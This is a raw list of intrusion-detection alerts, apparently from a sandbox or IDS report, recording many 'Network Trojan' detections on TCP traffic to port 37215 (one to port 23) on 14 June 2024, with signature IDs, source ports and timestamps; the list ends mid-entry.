                SID:2829579
                Source Port:54798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072152
                SID:2835222
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273233
                SID:2835222
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686539
                SID:2829579
                Source Port:43506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942993
                SID:2829579
                Source Port:50104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275465
                SID:2835222
                Source Port:49800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970776
                SID:2829579
                Source Port:43488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132490
                SID:2835222
                Source Port:50228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031245
                SID:2829579
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226886
                SID:2835222
                Source Port:40108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766566
                SID:2835222
                Source Port:44426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056095
                SID:2829579
                Source Port:52356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568223
                SID:2835222
                Source Port:55838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831205
                SID:2835222
                Source Port:53872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504192
                SID:2829579
                Source Port:56718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017586
                SID:2829579
                Source Port:49968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070755
                SID:2835222
                Source Port:57082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879079
                SID:2829579
                Source Port:57078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850138
                SID:2829579
                Source Port:36866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861461
                SID:2835222
                Source Port:45632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244960
                SID:2829579
                Source Port:60798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684131
                SID:2829579
                Source Port:39976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094696
                SID:2829579
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178404
                SID:2829579
                Source Port:35376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073372
                SID:2829579
                Source Port:48938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761192
                SID:2835222
                Source Port:38072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027371
                SID:2835222
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323400
                SID:2829579
                Source Port:52406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412181
                SID:2835222
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663231
                SID:2835222
                Source Port:46586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074789
                SID:2829579
                Source Port:39334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230191
                SID:2829579
                Source Port:38340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368548
                SID:2835222
                Source Port:35082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714950
                SID:2829579
                Source Port:53148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687123
                SID:2829579
                Source Port:48354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569363
                SID:2835222
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200463
                SID:2835222
                Source Port:54464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779963
                SID:2835222
                Source Port:48546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676820
                SID:2835222
                Source Port:35458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968549
                SID:2835222
                Source Port:60498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337076
                SID:2835222
                Source Port:59416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179454
                SID:2835222
                Source Port:47084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992494
                SID:2835222
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547319
                SID:2829579
                Source Port:50644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325089
                SID:2829579
                Source Port:53974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944335
                SID:2835222
                Source Port:41768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678262
                SID:2835222
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807305
                SID:2835222
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667399
                SID:2835222
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017467
                SID:2835222
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276940
                SID:2829579
                Source Port:39384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913739
                SID:2829579
                Source Port:44314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293020
                SID:2829579
                Source Port:37400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614567
                SID:2835222
                Source Port:52814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980621
                SID:2835222
                Source Port:48610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678225
                SID:2835222
                Source Port:55506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135224
                SID:2829579
                Source Port:45480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943292
                SID:2835222
                Source Port:57316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337004
                SID:2835222
                Source Port:35542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134056
                SID:2829579
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760565
                SID:2829579
                Source Port:37156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718489
                SID:2829579
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791628
                SID:2835222
                Source Port:48440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967006
                SID:2835222
                Source Port:40246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045951
                SID:2835222
                Source Port:45758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733666
                SID:2829579
                Source Port:42858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472129
                SID:2835222
                Source Port:48462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850390
                SID:2835222
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453432
                SID:2829579
                Source Port:35882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859551
                SID:2835222
                Source Port:32840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019223
                SID:2835222
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760932
                SID:2835222
                Source Port:45450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828512
                SID:2829579
                Source Port:35722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321301
                SID:2829579
                Source Port:50460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881024
                SID:2835222
                Source Port:42430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033054
                SID:2829579
                Source Port:36162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323589
                SID:2829579
                Source Port:43760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452516
                SID:2835222
                Source Port:54216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762911
                SID:2829579
                Source Port:37090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203226
                SID:2835222
                Source Port:40234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998615
                SID:2835222
                Source Port:57254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805942
                SID:2829579
                Source Port:58062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806635
                SID:2829579
                Source Port:47208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343279
                SID:2835222
                Source Port:39564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180332
                SID:2829579
                Source Port:57216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689360
                SID:2835222
                Source Port:50600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662023
                SID:2835222
                Source Port:52952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052026
                SID:2835222
                Source Port:53338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325202
                SID:2835222
                Source Port:60418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050916
                SID:2829579
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760077
                SID:2835222
                Source Port:48968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792336
                SID:2829579
                Source Port:46782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544356
                SID:2829579
                Source Port:58276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202877
                SID:2829579
                Source Port:50414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341543
                SID:2829579
                Source Port:58758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087747
                SID:2835222
                Source Port:56672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229320
                SID:2835222
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471551
                SID:2835222
                Source Port:51794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133207
                SID:2829579
                Source Port:34326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733335
                SID:2835222
                Source Port:32918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805690
                SID:2829579
                Source Port:43446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409151
                SID:2829579
                Source Port:46470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688795
                SID:2835222
                Source Port:42306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669919
                SID:2835222
                Source Port:46144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148878
                SID:2835222
                Source Port:42422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685486
                SID:2829579
                Source Port:35496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914076
                SID:2829579
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847555
                SID:2835222
                Source Port:34658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150381
                SID:2829579
                Source Port:58910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165256
                SID:2829579
                Source Port:34746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202577
                SID:2829579
                Source Port:45200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967653
                SID:2829579
                Source Port:33640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183476
                SID:2829579
                Source Port:49834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134413
                SID:2835222
                Source Port:35672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913307
                SID:2829579
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072740
                SID:2829579
                Source Port:39678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758888
                SID:2829579
                Source Port:33124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788615
                SID:2829579
                Source Port:58838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182648
                SID:2829579
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114826
                SID:2835222
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150471
                SID:2829579
                Source Port:42204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470703
                SID:2829579
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932878
                SID:2835222
                Source Port:48314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114075
                SID:2835222
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275439
                SID:2835222
                Source Port:44856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178064
                SID:2829579
                Source Port:54770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989009
                SID:2835222
                Source Port:40188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131258
                SID:2835222
                Source Port:54280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732100
                SID:2835222
                Source Port:42064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074991
                SID:2835222
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148956
                SID:2835222
                Source Port:37206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882806
                SID:2835222
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089675
                SID:2835222
                Source Port:42554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685541
                SID:2829579
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073087
                SID:2835222
                Source Port:55690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184883
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412277
                SID:2829579
                Source Port:59648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295328
                SID:2835222
                Source Port:37978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942252
                SID:2835222
                Source Port:39572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453903
                SID:2829579
                Source Port:33878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734143
                SID:2835222
                Source Port:40468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322749
                SID:2829579
                Source Port:41578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422241
                SID:2829579
                Source Port:42894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729585
                SID:2829579
                Source Port:50890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732821
                SID:2829579
                Source Port:45030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503381
                SID:2835222
                Source Port:53116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412227
                SID:2835222
                Source Port:33338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145775
                SID:2835222
                Source Port:40128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052622
                SID:2835222
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337717
                SID:2835222
                Source Port:60378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859680
                SID:2835222
                Source Port:50804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011030
                SID:2829579
                Source Port:49270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014085
                SID:2835222
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369123
                SID:2835222
                Source Port:37216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024728
                SID:2829579
                Source Port:37398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131772
                SID:2829579
                Source Port:41844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165358
                SID:2829579
                Source Port:43938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031610
                SID:2829579
                Source Port:36354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022972
                SID:2829579
                Source Port:38584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014724
                SID:2835222
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250476
                SID:2835222
                Source Port:57804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991720
                SID:2829579
                Source Port:57110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.013435
                SID:2840515
                Source Port:38724
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421485
                SID:2829579
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640589
                SID:2835222
                Source Port:53506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762902
                SID:2829579
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858871
                SID:2829579
                Source Port:48382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980214
                SID:2829579
                Source Port:47108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999358
                SID:2829579
                Source Port:47764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052423
                SID:2835222
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408526
                SID:2835222
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411427
                SID:2835222
                Source Port:35816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176828
                SID:2835222
                Source Port:44658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897246
                SID:2829579
                Source Port:44082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790502
                SID:2835222
                Source Port:60024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779661
                SID:2829579
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724192
                SID:2829579
                Source Port:49290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941570
                SID:2829579
                Source Port:55470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791329
                SID:2829579
                Source Port:53026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811561
                SID:2835222
                Source Port:39586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324821
                SID:2835222
                Source Port:39152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990428
                SID:2835222
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469956
                SID:2829579
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000023
                SID:2835222
                Source Port:53154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202426
                SID:2835222
                Source Port:42642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030299
                SID:2829579
                Source Port:36618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472830
                SID:2835222
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565436
                SID:2829579
                Source Port:38190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420552
                SID:2829579
                Source Port:51680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504166
                SID:2835222
                Source Port:50642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202148
                SID:2835222
                Source Port:36914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381745
                SID:2829579
                Source Port:49794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027273
                SID:2829579
                Source Port:40560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073880
                SID:2835222
                Source Port:37990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407102
                SID:2829579
                Source Port:37538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716299
                SID:2829579
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368013
                SID:2835222
                Source Port:45666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368522
                SID:2835222
                Source Port:49758
                Destination Port:37215
